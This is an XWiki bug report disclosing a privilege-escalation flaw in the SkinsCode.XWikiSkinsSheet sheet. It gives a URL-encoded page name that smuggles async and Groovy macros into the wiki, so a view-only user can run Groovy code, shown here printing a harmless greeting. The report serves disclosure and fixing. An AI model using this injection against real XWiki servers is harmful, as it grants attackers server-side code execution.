Details
-
Bug
-
Resolution: Fixed
-
Blocker
-
7.0-rc-1
-
Unit
-
Unknown
-
N/A
-
N/A
-
Description
Steps to reproduce:
Open <xwiki-host>/xwiki/bin/view/%22%5D%5D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=SkinsCode.XWikiSkinsSheet&xpage=view where <xwiki-host is the URL of your XWiki installation as guest or any user with view rights.
Expected result:
Two list items with "Edit this skin" and "Test this skin" are displayed without any further text.
Actual result:
The second list item is Test this skin Hello from groovy!.WebHome"]]. This shows that the Groovy macro has been executed and thus demonstrates a privilege escalation from view to programming right.
This should be exploitable since the sheet SkinsCode.XWikiSkinsSheet has been introduced as part of XWIKI-11803, so XWiki 7.0-rc-1.
Attachments
Issue Links
- links to